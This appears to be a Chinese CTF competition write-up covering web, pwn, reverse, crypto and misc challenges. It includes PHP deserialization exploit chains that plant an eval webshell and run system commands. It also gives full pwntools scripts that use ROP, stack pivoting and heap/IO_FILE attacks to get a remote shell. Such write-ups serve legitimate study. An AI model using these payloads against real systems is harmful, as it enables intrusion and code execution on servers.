0x00 前言
投稿被拒,扔博客备份一下😭
0x01 WEB
POP
源码
<?php
class catf1ag1{
public $hzy;
public $arr;
function show(){
show_source(__FILE__);
}
function __wakeup(){
foreach($this->arr as $k => $v){
echo $this->hzy->$v;
echo "</br>hzy是社么鬼???";
}
}
}
class catf1ag2{
public $file;
public $txt = '';
function __get($key){ (
if($key == 'pputut'){
return $this->pputut();
}else{
return '<p>'.htmlspecialchars($key).'</p>';
}
}
function pputut(){
if( strpos($this->file,'../') !== false ||
strpos($this->file,'\\') !== false
) die();
$content = '<?php die(\'stupid\'); ?>';
echo "NICE!!!,来自wsy赠送的小红花</br>";
$content .= $this->txt;
file_put_contents($this->file, $content);
return htmlspecialchars($content);
}
}
if(!empty($_POST)){
$hzy = base64_decode($_POST['giao']);
$instance = unserialize($hzy);
}else{
$a = new catf1ag1();
$a->show();
} exp:
<?php
class catf1ag1{
public $hzy;
public $arr;
public function __construct($hzy,$arr){
$this->hzy=$hzy;
$this->arr=$arr;
}
}
class catf1ag2{
public $file;
public $txt = '';
public function __construct($file,$txt){
$this->file=$file;
$this->txt=$txt;
}
}
$c2=new catf1ag2("php://filter/convert.base64-decode/resource=w1nd.php","PD9waHAgZXZhbCgkX1BPU1RbMV0pO2VjaG8oIjEyMyIpOz8+");
$c1=new catf1ag1($c2,array("1"=>"pputut"));
$ser=serialize($c1);
echo $ser."\n";
echo base64_encode($ser)."\n";
$obj=unserialize($ser);
//Tzo4OiJjYXRmMWFnMSI6Mjp7czozOiJoenkiO086ODoiY2F0ZjFhZzIiOjI6e3M6NDoiZmlsZSI7czo1MjoicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT13MW5kLnBocCI7czozOiJ0eHQiO3M6NDg6IlBEOXdhSEFnWlhaaGJDZ2tYMUJQVTFSYk1WMHBPMlZqYUc4b0lqRXlNeUlwT3o4KyI7fXM6MzoiYXJyIjthOjE6e2k6MTtzOjY6InBwdXR1dCI7fX0=
//POST:1=system('cat /f*');
ezlogin
/robots.txt
/imdex.php
TnpNMlpqYzFOekkyTXpZMU1tVTNNRFk0TnpBPQ==
/surprise/source.php
源码:
<?php
error_reporting(0);
highlight_file(__FILE__);
class A{
public $hello;
public function __construct(){
$this->hello = new C;
}
public function __toString(){
if (isset($this->hello)){
return $this->hello->world();
}else{
return "Are you ok? Small dog";
}
}
}
class B{
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;
}
public function world(){
$d = '<?php die("886");?>';
$a= $d. $this->text;
file_put_contents($this-> file,$a);
}
}
class C{
public function world(){
return "Hello,world!";
}
}
$cmd=$_GET['cmd'];
if(isset($cmd)){
echo $IO = unserialize($cmd);
}
else{
echo "where is your chain?";
}
?>exp:
<?php
class A{
public $hello;
public function __construct($hello){
$this->hello = $hello;
}
}
class B{
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;
}
}
$b=new B("php://filter/convert.base64-decode/resource=sakura501.php","aaaPD9waHAgZXZhbCgkX1BPU1RbMV0pO2VjaG8oIjEyMyIpOz8+");
$a=new A($b);
$ser=serialize($a);
echo urlencode($ser)."\n";
$unser=unserialize($ser);
echo $unser;
//O%3A1%3A%22A%22%3A1%3A%7Bs%3A5%3A%22hello%22%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-decode%2Fresource%3Dsakura501.php%22%3Bs%3A4%3A%22text%22%3Bs%3A51%3A%22aaaPD9waHAgZXZhbCgkX1BPU1RbMV0pO2VjaG8oIjEyMyIpOz8%2B%22%3B%7D%7D
//http://f6b47845.clsadp.com/surprise/sakura501.php->POST:1=system('cat /f*');
fileupload
首页有源代码:
error_reporting(0);
$text = $_GET['text'];
if(preg_match('[<>?]', $text)) {
die('error!');
}
if(!is_array($text) and isset($text))
{
echo "<div>Your f* put content is ".$text."</div>";
}
else
{
if(file_put_contents('/tmp/input.php', $text)){
include_once("include/f1ag_1s_n0t_here.php");
}
}dirsearch 扫一遍先,发现有uploads目录。
include/f1ag_1s_n0t_here.php可以上传文件,文件名跟verify参数有关,试了一下phar文件后缀可以解析。就是这里我写了一个马进去,但是传参会爆500,不太懂为啥。所以直接system执行了。上传的文件在uploads目录下面
history
grafana目录遍历(CVE-2021-43798)漏洞复现
0x02 PWN
checkin
atoi限制了最后read的大小,对于负数的检查可以加一个空格绕过
from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
mode = 0
if mode == 1:
fang = process("./checkin")
else:
fang = remote("180.76.166.28",6000)
elf = ELF("./checkin")
def debug():
gdb.attach(fang)
pause()
flag = 0x06010C0
pop_rdi_ret = 0x0000000000400a53 # : pop rdi ; ret
fang.recvuntil("name: \n")
fang.sendline("aaaa")
fang.recvuntil("Please input size: \n")
fang.sendline(" -1")
payload = b'a' * 0x50 + b'bbbbbbbb'
payload += p64(pop_rdi_ret) + p64(flag)
payload += p64(elf.plt['puts'])
fang.sendline(payload)
# debug()
fang.interactive()ezpwn
最后的one punch存在0x10的溢出
修改bp最后一字节进行栈迁移
from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
def pwn():
# fang = process("./pwn2")
fang = remote("180.76.166.28",13000)
try:
elf = ELF("./pwn2")
libc = ELF("./libc.so.6")
pop_rdi = 0x401413
main_addr = 0x4010f0
fang.recvuntil("[*] Give me something...\n")
pd = p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(main_addr)
fang.sendline(pd)
fang.recvuntil("[1] damage:\n")
fang.sendline(str(-1))
fang.recvuntil("[2] damage:\n")
fang.sendline(str(-1))
fang.recvuntil("ONE PUNCH ------------>")
pd = b'a' * 0x10 + b"\x58"
sleep(0.1)
fang.send(pd)
puts_addr = u64(fang.recvuntil('\x7f',timeout = 1)[-6:].ljust(8,b'\x00'))
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))
fang.recvuntil("[*] Give me something...\n")
pd = p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr) + p64(main_addr)
sleep(0.1)
fang.sendline(pd)
fang.recvuntil("[1] damage:\n")
fang.sendline(str(1))
fang.recvuntil("[2] damage:\n")
fang.sendline(str(1))
fang.recvuntil("ONE PUNCH ------------>")
pd = b'a' * 0x10 + b"\x28"
sleep(0.1)
fang.send(pd)
fang.sendline('cat flag')
sleep(0.2)
d = fang.recv(0x100, timeout=1)
if len(d) == 0:
raise EOFError()
print(d)
fang.interactive()
return
except BrokenPipeError as e:
fang.close()
raise e
except EOFError as e:
fang.close()
raise e
except struct.error as e:
fang.close()
raise e
while True:
try:
pwn()
break
except EOFError:
continue
except BrokenPipeError:
continue
except struct.error:
continuestackoverflow
栈迁移
from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
mode = 0
if mode == 1:
fang = process("./overflow")
else:
fang = remote("180.76.166.28",40001)
def debug():
gdb.attach(fang)
pause()
# gdb.attach(fang,"b *0x400717")
# pause()
elf = ELF("./overflow")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
pop_rdi = 0x04007a3 # : pop rdi ; ret
pop_rsi_r15 = 0x04007a1 #: pop rsi ; pop r15 ; ret
csu1 = 0x400780
csu2 = 0x40079A
leave_ret = 0x400718
bss_addr = 0x6010A0
offset = 50-2
ret = 0x400719
now_rsp = bss_addr + 0x200
fang.recvuntil("input your name:\n")
pd = flat(b'a' * (8 * offset),csu2,0,1,elf.got['puts'],0,0,elf.got['puts'],csu1,0,0,1,elf.got['read'],0x777,now_rsp,0,csu1)
log.info("len of pd : 0x%x" % len(pd))
fang.send(pd)
fang.recvuntil("input your data:\n")
pd = flat(b'a' * 0x70,bss_addr + 8 * (offset-1),leave_ret)
fang.send(pd)
puts_addr = u64(fang.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libcbase = puts_addr - libc.sym['puts']
system_addr = libcbase + libc.sym['system']
bin_sh_addr = libcbase + next(libc.search(b'/bin/sh'))
mprotect = libcbase + libc.sym['mprotect']
pop_rsi = libcbase + 0x002601f # : pop rsi ; ret
pop_rdx_rcx_rbx = libcbase + 0x010257d # : pop rdx ; pop rcx ; pop rbx ; ret
pd = flat(
0xdeadbeef,
0,1,
0xdeadbeef,0xdeadbeef,0xdeadbeef,0xdeadbeef,
pop_rdi,0x601000,
pop_rsi,0x1000,
pop_rdx_rcx_rbx,7,7,7,
mprotect,
pop_rdi,0,
pop_rsi,bss_addr,
pop_rdx_rcx_rbx,0x777,0x777,0x777,
elf.plt['read'],
bss_addr
)
sleep(0.1)
fang.send(pd)
pause()
fang.send(asm(shellcraft.sh()))
fang.interactive()
'''
.text:0000000000400780 loc_400780: ; CODE XREF: __libc_csu_init+54↓j
.text:0000000000400780 4C 89 EA mov rdx, r13
.text:0000000000400783 4C 89 F6 mov rsi, r14
.text:0000000000400786 44 89 FF mov edi, r15d
.text:0000000000400789 41 FF 14 DC call ds:(__frame_dummy_init_array_entry - 600E10h)[r12+rbx*8]
.text:0000000000400789
.text:000000000040078D 48 83 C3 01 add rbx, 1
.text:0000000000400791 48 39 EB cmp rbx, rbp
.text:0000000000400794 75 EA jnz short loc_400780
.text:0000000000400794
.text:0000000000400796 loc_400796: ; CODE XREF: __libc_csu_init+34↑j
.text:0000000000400796 48 83 C4 08 add rsp, 8
.text:000000000040079A 5B pop rbx
.text:000000000040079B 5D pop rbp
.text:000000000040079C 41 5C pop r12
.text:000000000040079E 41 5D pop r13
.text:00000000004007A0 41 5E pop r14
.text:00000000004007A2 41 5F pop r15
.text:00000000004007A4 C3 retn
'''argr
送分题,直接走后门函数即可
from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
mode = 0
if mode == 1:
fang = process("./bin")
else:
fang = remote("180.76.166.28",20001)
def debug():
gdb.attach(fang)
pause()
fang.sendline(str(0))
fang.recvuntil("input your passwd:\n")
fang.sendline(str(7))
sleep(0.1)
fang.sendline(str(2))
fang.interactive()chunk
UAF和bss上存放的chunk指针的利用,最后走IO流
from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
mode = 0
if mode == 1:
fang = process("./chunk")
else:
fang = remote("180.76.166.28",36000)
libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.31.so")
def debug():
gdb.attach(fang)
pause()
def alloc(opt,size = 0):
fang.recvuntil(">> ")
fang.sendline(str(1))
sleep(0.1)
fang.recvuntil(">> ")
fang.sendline(str(opt))
sleep(0.1)
if opt == 1:
fang.recvuntil("Size:")
fang.sendline(str(size))
def dele(idx):
fang.recvuntil(">> ")
fang.sendline(str(2))
sleep(0.1)
fang.recvuntil("Index: ")
fang.sendline(str(idx))
def clear():
fang.recvuntil("6. exit\n>> ")
fang.sendline(str(3))
def show(idx):
fang.recvuntil(">> ")
fang.sendline(str(4))
sleep(0.1)
fang.recvuntil("Index: ")
fang.sendline(str(idx))
def edit(idx,cont):
fang.recvuntil(">> ")
fang.sendline(str(5))
sleep(0.1)
fang.recvuntil("Index: ")
fang.sendline(str(idx))
sleep(0.1)
fang.send(cont)
alloc(1,0x40) # 0
alloc(1,0x40) # 1
alloc(1,0x40) # 2
alloc(1,0x40) # 3
alloc(1,0x200)# 4
alloc(1,0x200)# 5
alloc(1,0x0) # 6
dele(0)
clear()
dele(1)
dele(2)
alloc(2) # 0
alloc(2) # 7
alloc(2) # 8
dele(1)
clear()
# 0x0000000000000000 0x0000000200000000
payload = b'a' * 0xb0
edit(1,payload)
show(1)
fang.recvuntil('a' * 0xb0)
heap_addr = u64(fang.recv(6).ljust(8,b'\x00'))
heap_base = heap_addr - 0x320
# dele(2)
payload = b'a' * 0x80 + p64(heap_base + 0x2e0) * 6
edit(1,payload)
alloc(1,0x30) # 0
payload = b'a' * 0x8 + p64(0x81) + p64(heap_base + 0x3a0) +p64(heap_base + 0x10)+ p64(heap_base + 0x3a0) * 2
edit(0,payload)
payload = b'a' * 0x80 + p64(heap_base + 0x360) * 6
edit(1,payload)
alloc(1,0x30) # 8
payload = b'a' * 0x8 + p64(0x81) + p64(heap_base + 0x2a0) +p64(heap_base + 0x10)+ p64(heap_base + 0x3a0) * 2
edit(0,payload)
dele(2)
dele(2)
alloc(2) # 9
payload = b'a' * 0x80 + p64(heap_base + 0x360) * 6
edit(1,payload)
alloc(1,0x30) # 10
payload = payload = b'a' * 0x8 + p64(0x581)
edit(10,payload)
clear()
payload = b'a' * 0x80 + p64(heap_base + 0x6b0) * 6
edit(1,payload)
alloc(1,0x10) # 2
payload = p64(0x230) + p64(heap_base + 0x3a0)
edit(2,payload)
show(5)
fang.recvuntil("data: ")
libc_addr = u64(fang.recv(6).ljust(8,b'\x00'))
libc_base = libc_addr - 0x1ecbe0
one_gadget3 = [0xe3afe,0xe3b01,0xe3b04]
one_gadget_addr = libc_base + one_gadget3[0]
free_hook = libc_base + libc.symbols['__free_hook']
realloc_hook = libc_base + libc.symbols['__realloc_hook']
malloc_hook = libc_base + libc.symbols['__malloc_hook']
realloc = libc_base + libc.symbols['realloc']
mprotect = libc_base + libc.symbols['mprotect']
setcontext = libc_base + libc.symbols['setcontext']
ret = libc_base + 0x0000000000022679 # : ret
pop_rdi_ret = libc_base + 0x0000000000023b6a # : pop rdi ; ret
pop_rsi_ret = libc_base + 0x000000000002601f # : pop rsi ; ret
pop_rdx_ret = libc_base + 0x0000000000142c92 # : pop rdx ; ret
IO_list_all = libc_base + 0x1ed5a0
stderr = libc_base + 0x1ed780
IO_str_jumps = libc_base + 0x1e9560
payload = b'a' * 0x80 + p64(heap_base + 0x470) * 6
edit(1,payload)
alloc(1,0x10) # 11
edit(11,p64(heap_base + 0x6e0) * 2)
payload = p64(0)*5 + p64(1) + p64(0) + p64(libc_base + next(libc.search(b'/bin/sh')))
payload = payload.ljust(0xd8, b'\x00') + p64(IO_str_jumps - 8)
payload += p64(0) + p64(libc_base + libc.sym['system'])
edit(4,payload)
payload = b'a' * 0x80 + p64(IO_list_all - 0x30) * 6
edit(1,payload)
alloc(1,0x10) # 12
edit(12,p64(heap_base + 0x6e0) * 2)
# gdb.attach(fang,'b *(0x555555554000 + 0x1A89)')
# pause()
payload = b'a' * 0x80 + p64(free_hook - 0x30) * 6
edit(1,payload)
alloc(1,0x10) # 13
edit(13,p64(libc_base + libc.sym['system']) * 2)
fang.recvuntil(">> ")
fang.sendline(str(6))
log.info("heap_addr : 0x%x" % heap_addr)
log.info("heap_base : 0x%x" % heap_base)
log.info("libc_addr : 0x%x" % libc_addr)
log.info("libc_base : 0x%x" % libc_base)
log.info("free_hook : 0x%x" % free_hook)
log.info("malloc_hook : 0x%x" % malloc_hook)
log.info("realloc_hook : 0x%x" % realloc_hook)
log.info("realloc : 0x%x" % realloc)
log.info("one_gadget_addr : 0x%x" % one_gadget_addr)
log.info("stderr : 0x%x" % stderr)
# debug()
fang.interactive()
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL
0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL
0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL
'''0x03 RE
遗失的物品
apk有加密,感觉是伪加密
binwalk–>zip压缩->换后缀为apk->jadx反编译
MzMzNjMzMzMzMzM2MzMzMTMzMzczMzM0MzMzNjMzMzYzMzMzMzMzMTMzMzYzMzMxMzMzNjMzMzczMzM3MzYzMjMzMzYzMzMyMzMzNjMzMzIzMzM2MzMzNDMzMzYzMzM1MzMzNjMzMzMzMzM2MzMzNjMzMzYzMzM2MzMzMzMzMzgzMzMzMzMzNzMzMzMzMzMwMzMzNjMzMzQzMzMzMzMzNDMzMzMzMzM4MzMzMzMzMzUzMzMzMzMzOTMzMzMzMzM0MzMzNjMzMzQzMzMzMzMzMDMzMzMzMzM1MzMzMzMzMzMzMzMzMzMzODMzMzMzMzMwMzMzMzMzMzgzMzMzMzMzNzMzMzYzMzM2MzMzNjMzMzMzMzMzMzMzNTMzMzYzMzM1MzMzMzMzMzAzMzMzMzMzMDMzMzMzMzMyMzMzMzMzMzAzMzM3MzYzNDMzMzMzMzMxMzMzMzMzMzUzMzMzMzMzMzMzMzMzMzMxMzMzMzMzMzg=按照上面的加密方法解密:
checkin
发现是upx,解包
x引用GetWindowTextA
找到check函数
魔改rc4,输入全a动调得到key,异或解密得flag
flag{c8d4d879-7a03-405f-8b12-9085a944adad}
0x04 CRYPTO
easyrsa
题目给了c,d,n ,直接解就行了。
from Crypto.Util.number import *
d= 12344766091434434733173074189627377553017680360356962089159282442350343171988536143126785315325155784049041041740294461592715296364871912847202681353107182427067350160760722505537695351060872358780516757652343767211907987297081728669843916949983336698385141593880433674937737932158161117039734886760063825649623992179585362400642056715249145349214196969590250787495038347519927017407204272334005860911299915001920451629055970214564924913446260348649062607855669069184216149660211811217616624622378241195643396616228441026080441013816066477785035557421235574948446455413760957154157952685181318232685147981777529010093
c= 11665709552346194520404644475693304343544277312139717618599619856028953672850971126750357095315011211770308088484683204061365343120233905810281045824420833988717463919084545209896116273241788366262798828075566212041893949256528106615605492953529332060374278942243879658004499423676775019309335825331748319484916607746676069594715000075912334306124627379144493327297854542488373589404460931325101587726363963663368593838684601095345900109519178235587636259017532403848656471367893974805399463278536349688131608183835495334912159111202418065161491440462011639125641718883550113983387585871212805400726591849356527011578
n= 13717871972706962868710917190864395318380380788726354755874864666298971471295805029284299459288616488109296891203921497014120460143184810218680538647923519587681857800257311678203773339140281665350877914208278709865995451845445601706352659259559793431372688075659019308448963678380545045143583181131530985665822655263963917413080872997526445384954610888776917323156325542921415838122754036103689148810677276471252057077595104724365967333418002158480223657363936976281758713027828747277980907153645847605403914070601944617432177385048803228970693240587900504431163155958465431312258451026447435473865563581029300541109
flag=pow(c,d,n)
print(long_to_bytes(flag))
#flag{3895dfda-67b1-11ed-b784-b07b2568d266}
疑惑
由题目名字可以知道就是异或。
keys1 = "welcome_to_nine-ak_match_is_so_easy_!@!"
keys2 = "20 4 24 5 94 12 2 36 26 6 49 11 68 15 14 114 12 10 43 14 9 43 10 27 31 31 22 45 10 48 58 4 18 10 38 31 14 97 92"
k2=keys2.split(" ")
# print(k2)
flag=''
for s,a in zip(keys1,k2) :
# print(ord(s),int(a))
tmp=ord(s)^int(a)
flag+=chr(tmp)
print(flag)
#catf1ag{nine-ak_match_is@very_easy_@/!}passwd
生成日期字典:
with open('date.txt','w')as f:
for i in range(1,13):
for j in range(1,32):
for k in range(1,25):
for l in range(1,61):
f.writelines(f"2022{i:0>2d}{j:0>2d}{k:0>2d}{l:0>2d}\n")识别hash类型:sha256
爆破:
catf1ag{202211121750}0x05 MISC
简单隐写
使用binwalk分离出一个RAR压缩包
使用JPHS的Seek无密码得到其中的隐写内容(密码)
凯撒密码:
十位马
附件的数据先转十六进制然后反转最后再转回十六进制。
使用winhex,写入16进制保存成文件:
使用binwalk分离:
得到一堆图片
按顺序拼接
from PIL import Image
import numpy as np
row = 10
column = 10
image_size = 30
def getImgList():
list=[]
for i in range(100):
# print(f"./WHAT_1S_FLAG/WHAT_1S_FLAG_{i:0>2d}.png")
list.append(Image.open(f"./WHAT_1S_FLAG/WHAT_1S_FLAG_{i:0>2d}.png"))
return list
def getBoxlist():
boxList=[]
for ind in range(100):
row, col = ind // 10, ind % 10
location = (col * 30, row * 30)
boxList.append(location)
return boxList
def image_merge():
target_shape = (row * image_size, column * image_size)
background = Image.new('RGBA', target_shape, (0,0,0,0,))
imgList = getImgList()
boxList = getBoxlist()
for i in range(0, len(imgList)):
background.paste(imgList[i],boxList[i])
background.save("./res.png")
if __name__ == '__main__':
image_merge()
填充一下定位符就好了
flag{cbef4c93-5e9c-11ed-8205-666c80085daf}
